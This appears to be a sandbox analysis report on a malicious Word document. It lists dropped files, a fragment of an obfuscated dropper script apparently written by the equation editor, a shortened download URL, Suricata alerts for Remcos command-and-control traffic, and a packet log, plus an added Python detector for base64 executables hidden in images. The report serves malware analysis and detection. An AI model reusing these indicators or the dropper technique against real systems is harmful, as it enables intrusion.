                                        SHA1:59051437516EF289071C20AA7E9495F1E6C40D21
                                        SHA-256:C529C9AE92C90F850F1017A65D7AA3D0AEEB47094869524217021D8E021CC08E
                                        SHA-512:F11D5794A7C835C4BDCC4847447C21C97A0E1055564149B7E1CA70CC69F84FA9930A54EA0DBC2BE75F0BED5019E3E20FB4F1E5A93B002AE21EAA49781440013F
                                        Malicious:false
                                        Preview:[folders]..rXgoN.url=0..gvt on 85.239.241.184.url=0..xrrwwstCMd.LNK=0..[misc]..xrrwwstCMd.LNK=0..
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://zeep.ly/rXgoN>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):46
                                        Entropy (8bit):4.544876086303668
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/5lfcM98:HRYFVm/5lfT98
                                        MD5:BCD0B88398DD03E6FCE1C320EE1CA29B
                                        SHA1:32A5F01F3D56A3A1936EAF29C6F3C58FFA1C7F64
                                        SHA-256:DF3A97C79B707E716B99A2FA9D6E380EBE2B53FEE6964DAA01A50BA3E759B2E0
                                        SHA-512:32A56511CE604C9AB8B2AFA693358E2CD568EB7B82E70636BD265C89B44C6ABFCE705C14C540777DAD647AC5D50717E07AAEBF53C9C879D9F14C3F13F7D6673A
                                        Malicious:true
                                        Preview:[InternetShortcut]..URL=http://zeep.ly/rXgoN..
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Sep 9 14:34:20 2024, length=188247, window=hide
                                        Category:dropped
                                        Size (bytes):1019
                                        Entropy (8bit):4.555352756792704
                                        Encrypted:false
                                        SSDEEP:12:8ly80gXg/XAlCPCHaX4BfB/BGFX+W2oNGzjuicvbL4izNDtZ3YilMMEpxRljKzqB:8Rk/XTIRbk4rXNePRDv3qm157u
                                        MD5:EA1C842A2B523E8F89191B6B51FE2D3C
                                        SHA1:EF5E3BF37A71232331BCC2265CD46D500CF957D2
                                        SHA-256:D76693054B3BD794526B9C54E67C1F70C928FF1CEBD5E1AECC98EDCA3079C131
                                        SHA-512:8EE5CD1647FC2B90439F1525F151C8644E14DEB74CBB34616B2E420F913A5D4B9D8FB3BE8A9BFC35D6E6924C494459815967D3FF874B3043AC8A5C860F86774C
                                        Malicious:false
                                        Preview:L..................F.... .......r.......r...o.[.....W............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....)YH|..user.8......QK.X)YH|*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.W...)YK| .XRRWWS~1.DOC..L.......WD..WD.*.........................x.r.r.w.w.s.t.C.M.d...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\xrrwwstCMd.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.x.r.r.w.w.s.t.C.M.d...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......980108..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):71
                                        Entropy (8bit):4.125159838940989
                                        Encrypted:false
                                        SSDEEP:3:X6RSj2u0jNHXQgQW7X33cC:qRc2VjV8WT3r
                                        MD5:0F4BA16B5A6F84E18C048BBDB788EBA5
                                        SHA1:44BED38B7591753FBE852B6A5AFFF9F1B29009C1
                                        SHA-256:9F5373E32CA101BDD224AF1FFB8381EC8BCAFAA65AC4316498075E9E570E5B1C
                                        SHA-512:600BD2A897A3516D8F7FCA963FF3501D3D0881906210E4A32A5DEF6FB0F95E9DC2573EE6692ECFD5035A6F936D7377BE559D5C2CB43214661D80B4350EB6DB78
                                        Malicious:false
                                        Preview:short_478563.1.zeep.ly/.9728.3700952576.31130319.3290984997.31130317.*.
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):195478
                                        Entropy (8bit):3.8654176042193766
                                        Encrypted:false
                                        SSDEEP:3072:ElIR9Mt8PiEZZNdYogt5pNGwdBiLYXnKO81LZh+Ukf9IV:kU9Mt8PNNdYxXKv1h+U7V
                                        MD5:9C60CEE4860F1FB648D10AA19522CA83
                                        SHA1:592F4BC6EF04AFB622541DD0305272FD9A8B8100
                                        SHA-256:36083400B2237AAEC532B29FEE51CAD3CF82F4B32816716256B4A9718D118DDC
                                        SHA-512:3E349809E5EA1ABA37277B5F745AC3C45A1D375A57F4652543949334D1FFD44A5B0A62352D8B1BA9922E9A295FBD8B7C3D60BB01C91E138F0C86924DCBCE4D2C
                                        Malicious:true
                                        Preview:..N.o.A.h.Q.a.d.i.s.e.W.A. .=. .".A.Z.e.O.P.h.K.t.L.Z.O.O.".....t.i.W.d.k.n.e.K.Z.e.U.K. .=. .".d.L.i.k.f.G.L.W.k.u.e.g.".....f.O.z.q.N.K.A.z.K.A.U.Z. .=. .".n.j.m.W.W.l.R.C.K.c.K.O.".....c.k.f.l.s.O.K.q.p.f.c.f. .=. .".i.O.t.v.P.K.o.z.k.p.R.o.".....W.n.h.b.N.c.K.Z.I.I.O.i. .=. .".U.e.x.K.c.C.m.G.u.a.b.o.".....e.G.m.s.q.f.v.Q.u.L.q.B. .=. .".b.W.N.u.k.O.v.K.U.h.C.k.".....O.k.s.L.d.W.R.G.C.j.P.L. .=. .".G.K.U.i.s.f.L.L.i.A.c.q.".....j.z.l.O.O.o.l.W.U.f.A.W. .=. .".R.p.K.U.f.o.m.c.b.x.G.o.".....G.k.i.e.j.e.m.j.r.d.L.b. .=. .".A.p.q.h.m.d.Z.A.c.c.r.U.".....x.H.i.L.t.S.P.K.f.W.W.f. .=. .".p.z.B.W.J.t.N.m.m.m.t.x.".........Z.i.r.R.f.G.c.J.P.W.W.c. .=. .".W.G.a.G.c.C.A.L.d.L.m.W.".....o.A.i.U.g.r.f.Z.z.n.W.O. .=. .".i.B.B.R.t.s.d.m.i.W.W.c.".....K.i.x.r.W.d.S.Z.I.L.L.L. .=. .".A.v.m.e.c.n.f.p.u.z.P.U.".....n.K.O.c.o.u.k.u.B.R.l.n. .=. .".i.G.m.i.P.o.m.L.N.C.U.Z.".....Z.T.b.A.g.h.I.N.C.j.L.H. .=. .".d.d.i.L.K.K.R.L.k.t.H.b.".....U.G.W.W.N.U.t.k.A.L.U.P. .=. .".L.e.W.d.x.W.K.N.W.N.n.W.".....s.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):228617
                                        Entropy (8bit):7.9712693292003545
                                        Encrypted:false
                                        SSDEEP:6144:bl7Sa7CFQvpPA+X3JWRFhPRxOIrHFIwyIFdswux53l:bl7N7MQ6+XIRzvOyhkx51
                                        MD5:48CBE4BEFDE136E6383354AE4AECD99A
                                        SHA1:862E5883F56993CA978018802D648BA31EE75DD1
                                        SHA-256:1EDE58809193E28A4139F6C6E6F4E508B46F13F56CF8A4EDF44B883E23EAE1A3
                                        SHA-512:2F6D659A6C82C1B3774BF3511EA8C9663BE26DCF640F3B5995DA333781B7C7FC1BE29779018F5FCCAE508364D49476813F6E06231F0FC99E827F391A0D6E28C0
                                        Malicious:true
                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4797606462020307
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                        Malicious:false
                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):228617
                                        Entropy (8bit):7.9712693292003545
                                        Encrypted:false
                                        SSDEEP:6144:bl7Sa7CFQvpPA+X3JWRFhPRxOIrHFIwyIFdswux53l:bl7N7MQ6+XIRzvOyhkx51
                                        MD5:48CBE4BEFDE136E6383354AE4AECD99A
                                        SHA1:862E5883F56993CA978018802D648BA31EE75DD1
                                        SHA-256:1EDE58809193E28A4139F6C6E6F4E508B46F13F56CF8A4EDF44B883E23EAE1A3
                                        SHA-512:2F6D659A6C82C1B3774BF3511EA8C9663BE26DCF640F3B5995DA333781B7C7FC1BE29779018F5FCCAE508364D49476813F6E06231F0FC99E827F391A0D6E28C0
                                        Malicious:false
                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:Microsoft Word 2007+
                                        Entropy (8bit):7.983436854090507
                                        TrID:
                                        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                        • ZIP compressed archive (8000/1) 9.41%
                                        File name:xrrwwstCMd.docx
                                        File size:188'247 bytes
                                        MD5:7a26583595ab1c59cba058c4327335ed
                                        SHA1:a745152360c26a93aa72b4e7bd0b1f69a91226af
                                        SHA256:f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76
                                        SHA512:a7d4b521cdd98b79d529a0eccaa1b8e4cf04f921b14ef7a62d882232cff5e45dca8883017d8f41644ee9763e335f4d0e17e06b7d53cd9ade0e606b5196fa1d72
                                        SSDEEP:3072:UFDHPsF7pVUyYtbAixTyDpAmMXZt4r6/4mS6UoxynXG1wk3l3hg4BtxChXOIPCr2:Ud0lpayYtfMSPXLLjS6UtXG1wk9wbrt
                                        TLSH:EB040281E949411AC1810773A805BECEDB575E73C29718D7A2B0CFDE1AB61DFAB0386D
                                        File Content Preview:PK.........Y)Ys"P)............[Content_Types].xmlUT...E..fE..fE..f.V.N.0.._....E.[...j.....n.......d.....7.B..B....9.1s.vF..k...I{W.a5`.8..v..=Ln.sV$.N....l..]....&... .K5.#...'9.+R..8Zi|...5.x..I.....g\z........;2....^D...t....7.....":V\..,]3...R ../N}.-
                                        Icon Hash:65e6a3a3afb7bdbf
                                        Document Type:OpenXML
                                        Number of OLE Files:1
                                        Has Summary Info:
                                        Application Name:
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:False
                                        Flash Objects Count:0
                                        Contains VBA Macros:False
                                        Title:
                                        Subject:
                                        Author:91974
                                        Keywords:
                                        Template:Normal.dotm
                                        Last Saved By:91974
                                        Revision Number:2
                                        Total Edit Time:1
                                        Create Time:2024-09-04T15:50:00Z
                                        Last Saved Time:2024-09-04T15:51:00Z
                                        Number of Pages:1
                                        Number of Words:0
                                        Number of Characters:0
                                        Creating Application:Microsoft Office Word
                                        Security:0
                                        Number of Lines:1
                                        Number of Paragraphs:1
                                        Thumbnail Scaling Desired:false
                                        Company:Grizli777
                                        Contains Dirty Links:false
                                        Shared Document:false
                                        Changed Hyperlinks:false
                                        Application Version:12.0000
                                        General
                                        Stream Path:\x1CompObj
                                        CLSID:
                                        File Type:data
                                        Stream Size:94
                                        Entropy:4.345966460061678
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:\x1Ole
                                        CLSID:
                                        File Type:data
                                        Stream Size:20
                                        Entropy:0.5689955935892812
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        General
                                        Stream Path:\x3EPRINT
                                        CLSID:
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Stream Size:1504468
                                        Entropy:0.9492057268722054
                                        Base64 Encoded:True
                                        Data ASCII:. . . . l . . . . . . . . . . . I . . . R . . . . . . . . . . . : . . ) . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . ) . . . . . . . . . . J . . . S . . . Q . . . . . . . . . . . . . . I . . . R . . . . . . . . . . . . . . . . . . . J . . . S . . . P . . . ( . . . x . . . . . . . . . . . : . . ) . . ( . . . J . . . S . . . . . . . . . . . . . . . .
                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 49 03 00 00 52 02 00 00 00 00 00 00 00 00 00 00 ed 3a 00 00 bf 29 00 00 20 45 4d 46 00 00 01 00 d4 f4 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                        General
                                        Stream Path:\x3ObjInfo
                                        CLSID:
                                        File Type:data
                                        Stream Size:6
                                        Entropy:1.2516291673878228
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . .
                                        Data Raw:00 00 03 00 0d 00
                                        General
                                        Stream Path:CONTENTS
                                        CLSID:
                                        File Type:PDF document, version 1.7, 2 pages
                                        Stream Size:61942
                                        Entropy:7.956770725678564
                                        Base64 Encoded:True
                                        Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / P a g e M o d e / U s e N o n e . / V i e w e r P r e f e r e n c e s < < . / F i t W i n d o w t r u e . / P a g e L a y o u t / S i n g l e P a g e . / N o n F u l l S c r e e n P a g e M o d e / U s e N o n e . > > . > > . e n d o b j . 5 0 o b j . < < . / L e n g t h 2 8 2 1 . / F i l t e r [ / F l a t e D e c o d e ] . > > . s t r e a m . x Y
                                        Data Raw:25 50 44 46 2d 31 2e 37 20 0a 25 e2 e3 cf d3 20 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 20 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 0a 2f 50 61 67 65 73 20 32 20 30 20 52 20 0a 2f 50 61 67 65 4d 6f 64 65 20 2f 55 73 65 4e 6f 6e 65 20 0a 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 3c 3c 20 0a 2f 46 69 74 57 69 6e 64 6f 77 20 74 72 75 65 20 0a 2f 50 61 67 65 4c 61 79
Timestamp                        SID      Signature                                               Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2024-09-09T17:34:41.212366+0200  2049038  ET MALWARE Malicious Base64 Encoded Payload In Image    1         207.241.227.96   443          192.168.2.22     49170      TCP
2024-09-09T17:34:42.017603+0200  2020423  ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1  1         185.239.241.184  80           192.168.2.22     49171      TCP
2024-09-09T17:34:42.017603+0200  2020425  ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1  1         185.239.241.184  80           192.168.2.22     49171      TCP
2024-09-09T17:34:43.502450+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22     49172        45.89.247.65     2201       TCP
2024-09-09T17:34:44.930337+0200  2803304  ETPRO MALWARE Common Downloader Header Pattern HCa      3         192.168.2.22     49174        178.237.33.50    80         TCP
2024-09-09T17:34:45.019371+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22     49173        45.89.247.65     2201       TCP
2024-09-09T17:35:19.102190+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22     49175        45.89.247.65     2201       TCP
2024-09-09T17:35:19.260059+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22     49176        45.89.247.65     2201       TCP
2024-09-09T17:35:23.687948+0200  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection             1         192.168.2.22     49177        45.89.247.65     2201       TCP
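The first alert in the list above (SID 2049038) fires on a base64-encoded payload carried inside an image fetched from 207.241.227.96:443, the stager pattern in which an executable is hidden as text inside an otherwise valid picture. The block below is an added example and not part of the Joe Sandbox report: it shows the check an analyst performs on such a downloaded image by hand, locating long base64 runs, decoding each one plain and reversed (a variant some loaders use), and keeping only runs that decode to a PE. The JFIF stub, the marker tags and the header-only fake PE are constructed test data, and the block makes no claim about what the Suricata rule itself matches on.

```python
import base64
import re
import struct
from typing import List, Optional, Tuple

# Shortest run of base64-alphabet characters worth decoding. Real payloads are
# tens of kilobytes; 64 keeps accidental runs inside compressed image data out.
MIN_RUN = 64
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_RUN)


def _decode(run: bytes) -> Optional[bytes]:
    """Strictly decode one candidate run, restoring any stripped '=' padding."""
    run += b"=" * (-len(run) % 4)
    try:
        return base64.b64decode(run, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def looks_like_pe(data: bytes) -> bool:
    """'MZ' at offset 0 and e_lfanew (offset 0x3C) pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_pe_payloads(blob: bytes) -> List[Tuple[int, str, bytes]]:
    """Find base64 runs in an arbitrary blob that decode to a PE image.

    Each hit is (offset in blob, encoding, decoded bytes); encoding is 'b64'
    for plain base64 or 'b64-reversed' when the text had to be reversed first.
    """
    hits = []
    for m in B64_RUN.finditer(blob):
        run = m.group(0)
        for label, candidate in (("b64", run), ("b64-reversed", run[::-1])):
            decoded = _decode(candidate)
            if decoded is not None and looks_like_pe(decoded):
                hits.append((m.start(), label, decoded))
                break
    return hits


# ---- constructed test data, not taken from the analysed sample --------------

def fake_pe() -> bytes:
    """Header-only PE: DOS header with e_lfanew = 0x40, then the 'PE\\0\\0' tag."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 0x20


def build_sample_image(reverse: bool) -> bytes:
    """A JFIF stub with a base64 PE appended between hypothetical marker tags."""
    payload = base64.b64encode(fake_pe())
    if reverse:
        payload = payload[::-1]
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
            + b"\x00" * 32
            + b"<<BASE64_START>>" + payload + b"<<BASE64_END>>"
            + b"\xff\xd9")


if __name__ == "__main__":
    for rev in (False, True):
        for off, enc, pe in extract_pe_payloads(build_sample_image(rev)):
            print(f"offset={off} encoding={enc} size={len(pe)} bytes")
```

Run it against the real image with `extract_pe_payloads(open(path, "rb").read())`; a hit whose decoded bytes pass `looks_like_pe` is the stage to carve out and hash, and the offset tells you whether it sits in the image's trailer or inside a metadata segment.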
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Sep 9, 2024 17:34:23.304508924 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:23.309369087 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:23.309463024 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:23.309561014 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:23.314362049 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:23.969957113 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:23.970211029 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.289424896 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.294397116 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:24.294502020 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.295125008 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.299977064 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:24.972798109 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:24.974925995 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.974965096 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:24.975014925 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.976788998 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:24.976797104 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:25.183660030 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:25.187197924 CEST  80           49162      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:25.187247992 CEST  49162        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:25.670115948 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:25.670329094 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:25.675405025 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:25.675415993 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:25.675703049 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:25.752809048 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:25.795422077 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:26.016709089 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:26.016849995 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:26.016904116 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:26.017636061 CEST  49163        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:26.017656088 CEST  443          49163      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:29.224389076 CEST  49164        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.230214119 CEST  80           49164      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:29.230281115 CEST  49164        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.230367899 CEST  49164        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.239844084 CEST  80           49164      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:29.909708977 CEST  80           49164      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:29.910393953 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.910455942 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:29.910526037 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.911240101 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:29.911259890 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:30.113308907 CEST  49164        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:30.741848946 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:30.742010117 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:30.747756958 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:30.747797966 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:30.748030901 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:30.763539076 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:30.807404041 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.077253103 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.077313900 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.077450991 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.077464104 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.077508926 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.078193903 CEST  49165        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.078216076 CEST  443          49165      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.117149115 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.122235060 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.321489096 CEST  80           49161      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.321681976 CEST  49161        80         192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.328511953 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.328573942 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:31.328634977 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.330502987 CEST  49166        443        192.168.2.22     95.217.202.210
Sep 9, 2024 17:34:31.330534935 CEST  443          49166      95.217.202.210   192.168.2.22
Sep 9, 2024 17:34:32.008097887 CEST  443          49166      95.217.202.210   192.168.2.22
